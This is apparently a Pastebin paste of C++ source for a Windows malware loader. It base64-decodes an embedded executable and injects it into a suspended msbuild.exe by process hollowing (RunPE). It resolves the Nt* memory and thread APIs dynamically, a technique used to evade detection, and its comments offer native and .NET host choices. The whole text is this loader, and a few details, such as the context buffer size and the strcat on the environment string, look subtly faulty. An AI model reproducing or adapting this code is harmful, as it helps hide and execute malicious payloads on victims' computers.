SHARE
TWEET

Untitled

a guest May 23rd, 2019 69 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #include <Windows.h>
  2. #include <iostream>
  3. #include <string>
  4.  
  5. using namespace std;
  6.  
  7.  
  8.  
  9. const string base64_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  10.  
  11. bool is_base64(unsigned char c)
  12. {
  13.     return (isalnum(c) || (c == '+') || (c == '/'));
  14. }
  15.  
  16.  
  17. string base64_decode(string const& encoded_string) {
  18.     int in_len = encoded_string.size();
  19.     int i = 0;
  20.     int j = 0;
  21.     int in_ = 0;
  22.     unsigned char char_array_4[4], char_array_3[3];
  23.     string ret;
  24.     while (in_len-- && (encoded_string[in_] != '=') && is_base64(encoded_string[in_]))
  25.     {
  26.         char_array_4[i++] = encoded_string[in_]; in_++;
  27.         if (i == 4) {
  28.             for (i = 0; i < 4; i++)
  29.             {
  30.                 char_array_4[i] = base64_chars.find(char_array_4[i]);
  31.             }
  32.             char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
  33.             char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
  34.             char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];
  35.  
  36.             for (i = 0; (i < 3); i++)
  37.             {
  38.                 ret += char_array_3[i];
  39.             }
  40.             i = 0;
  41.         }
  42.     }
  43.     if (i) {
  44.         for (j = i; j < 4; j++)
  45.         {
  46.             char_array_4[j] = 0;
  47.         }
  48.         for (j = 0; j < 4; j++)
  49.         {
  50.             char_array_4[j] = base64_chars.find(char_array_4[j]);
  51.         }
  52.         char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
  53.         char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
  54.         char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];
  55.  
  56.         for (j = 0; (j < i - 1); j++)
  57.         {
  58.             ret += char_array_3[j];
  59.         }
  60.     }
  61.     return ret;
  62. }
  63.  
  64. char kerDll[] = "kernel32.dll";
  65.  
  66. char kerCP[] = "CreateProcessA";
  67. typedef  BOOL(WINAPI *CreateProcessAA) (LPCTSTR, LPTSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCTSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION);
  68.  
  69. char kerVAE[] = "VirtualAllocEx";
  70. typedef LPVOID(WINAPI * VirtualAllocExA) (HANDLE, LPVOID, SIZE_T, DWORD, DWORD);
  71.  
  72. char ntDll[] = "ntdll.dll";
  73.  
  74. char ntRVM[] = "NtReadVirtualMemory";
  75. typedef LONG(NTAPI * NtReadVirtualMemory) (HANDLE, PVOID, PVOID, ULONG, PULONG);
  76.  
  77. char ntWVM[] = "NtWriteVirtualMemory";
  78. typedef LONG(NTAPI * NtWriteVirtualMemory) (HANDLE, PVOID, PVOID, ULONG, PULONG);
  79.  
  80.  
  81. char ntUVOS[] = "NtUnmapViewOfSection";
  82. typedef LONG(NTAPI * NtUnmapViewOfSection) (HANDLE, PVOID);
  83.  
  84. char ntGCT[] = "NtGetContextThread";
  85. typedef LONG(NTAPI * NtGetContextThread) (HANDLE, PCONTEXT);
  86.  
  87. char ntSCT[] = "NtSetContextThread";
  88. typedef LONG(NTAPI * NtSetContextThread) (HANDLE, PCONTEXT);
  89.  
  90. char ntRT[] = "NtResumeThread";
  91. typedef LONG(NTAPI * NtResumeThread) (HANDLE);
  92.  
  93. int RunPeEXE(void *buff, LPSTR path) {
  94.  
  95.     DWORD baseAddr;
  96.     LPVOID pEXE;
  97.     PIMAGE_DOS_HEADER pDHeader;
  98.     PIMAGE_NT_HEADERS pNtHeader;
  99.     PIMAGE_SECTION_HEADER pSHeader;
  100.     STARTUPINFO SI;
  101.     PROCESS_INFORMATION PI;
  102.     PCONTEXT ctx;
  103.  
  104.     CreateProcessAA sCreateProcess;
  105.     VirtualAllocExA sVirtualAllocEx;
  106.  
  107.     NtUnmapViewOfSection sNtUnmapViewOfSection;
  108.  
  109.     NtReadVirtualMemory sNtReadVirtualMemory;
  110.     NtWriteVirtualMemory sNtWriteVirtualMemory;
  111.  
  112.     NtGetContextThread sNtGetContextThread;
  113.     NtSetContextThread sNtSetContextThread;
  114.     NtResumeThread sNtResumeThread;
  115.  
  116.     ZeroMemory(&SI, sizeof(SI));
  117.     ZeroMemory(&PI, sizeof(PI));
  118.  
  119.  
  120.     pDHeader = (PIMAGE_DOS_HEADER)buff;
  121.  
  122.     if (pDHeader->e_magic != IMAGE_DOS_SIGNATURE)
  123.     {
  124.         return 1;
  125.     }
  126.     pNtHeader = (PIMAGE_NT_HEADERS)((intptr_t)buff + pDHeader->e_lfanew);
  127.  
  128.     if ((sCreateProcess = CreateProcessAA(GetProcAddress(GetModuleHandle((LPCWSTR)kerDll), kerCP))) == 0)
  129.     {
  130.         return 1;
  131.     }
  132.     if (!sCreateProcess((LPCTSTR)path, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
  133.     {
  134.         return 1;
  135.     }
  136.     ctx = (PCONTEXT)VirtualAlloc(NULL, sizeof(ctx), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
  137.  
  138.     ctx->ContextFlags = CONTEXT_FULL;
  139.     if ((sNtGetContextThread = NtGetContextThread(GetProcAddress(GetModuleHandle((LPCWSTR)ntDll), ntGCT))) == 0)
  140.     {
  141.         return 1;
  142.     }
  143.     sNtGetContextThread(PI.hThread, (LPCONTEXT)ctx);
  144.  
  145.     if ((sNtReadVirtualMemory = NtReadVirtualMemory(GetProcAddress(GetModuleHandle((LPCWSTR)ntDll), ntRVM))) == 0)
  146.     {
  147.         return 1;
  148.     }
  149.  
  150.     sNtReadVirtualMemory(PI.hProcess, PVOID(ctx->Ebx + 8), &baseAddr, sizeof(DWORD), NULL);
  151.  
  152.     if ((DWORD)baseAddr == pNtHeader->OptionalHeader.ImageBase)
  153.     {
  154.         if ((sNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandle((LPCWSTR)ntDll), ntUVOS))) == 0)
  155.         {
  156.             return 1;
  157.         }
  158.         sNtUnmapViewOfSection(PI.hProcess, PVOID(baseAddr));
  159.     }
  160.  
  161.     if ((sVirtualAllocEx = VirtualAllocExA(GetProcAddress(GetModuleHandle((LPCWSTR)kerDll), kerVAE))) == 0)
  162.     {
  163.         return 1;
  164.     }
  165.  
  166.     pEXE = sVirtualAllocEx(PI.hProcess, (LPVOID)pNtHeader->OptionalHeader.ImageBase, pNtHeader->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  167.  
  168.     if ((sNtWriteVirtualMemory = NtWriteVirtualMemory(GetProcAddress(GetModuleHandle((LPCWSTR)ntDll), ntWVM))) == 0)
  169.     {
  170.         return 1;
  171.     }
  172.     sNtWriteVirtualMemory(PI.hProcess, (PVOID)pEXE, buff, pNtHeader->OptionalHeader.SizeOfHeaders, NULL);
  173.  
  174.     for (int i = 0; i < pNtHeader->FileHeader.NumberOfSections; i++)
  175.     {
  176.         pSHeader = (PIMAGE_SECTION_HEADER)((intptr_t)buff + pDHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) * i);
  177.         sNtWriteVirtualMemory(PI.hProcess, (PVOID)((DWORD)pEXE + pSHeader->VirtualAddress), (PWCHAR)buff + pSHeader->PointerToRawData, pSHeader->SizeOfRawData, NULL);
  178.     }
  179.  
  180.     sNtWriteVirtualMemory(PI.hProcess, (LPVOID)(ctx->Ebx + 8), (LPVOID)&pNtHeader->OptionalHeader.ImageBase, sizeof(DWORD), NULL);
  181.     ctx->Eax = (DWORD)pEXE + pNtHeader->OptionalHeader.AddressOfEntryPoint;
  182.  
  183.     if ((sNtSetContextThread = NtSetContextThread(GetProcAddress(GetModuleHandle((LPCWSTR)ntDll), ntSCT))) == 0)
  184.     {
  185.         return 1;
  186.     }
  187.  
  188.     sNtSetContextThread(PI.hThread, LPCONTEXT(ctx));
  189.  
  190.     if ((sNtResumeThread = NtResumeThread(GetProcAddress(GetModuleHandle((LPCWSTR)ntDll), ntRT))) == 0)
  191.     {
  192.         return 1;
  193.     }
  194.  
  195.     sNtResumeThread(PI.hThread);
  196.  
  197.     return 1;
  198. }
  199.  
  200. int main()
  201. {  
  202.    
  203.     LPSTR injectPath = getenv("windir");
  204.     //strcat(injectPath, "\\system32\\calc.exe"); for Native
  205.     //strcat(injectPath, "\\Microsoft.NET\\Framework\\v2.0.50727\\msbuild.exe"); for .NET
  206.     strcat(injectPath, "\\Microsoft.NET\\Framework\\v2.0.50727\\msbuild.exe");
  207.     std::string b64Str = "Base64String";
  208.     unsigned char * bBin = (unsigned char*)base64_decode(b64Str).c_str();
  209.     RunPeEXE((void*)bBin, injectPath);
  210.     return 0;
  211.    
  212.    
  213.     return 0;
  214. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top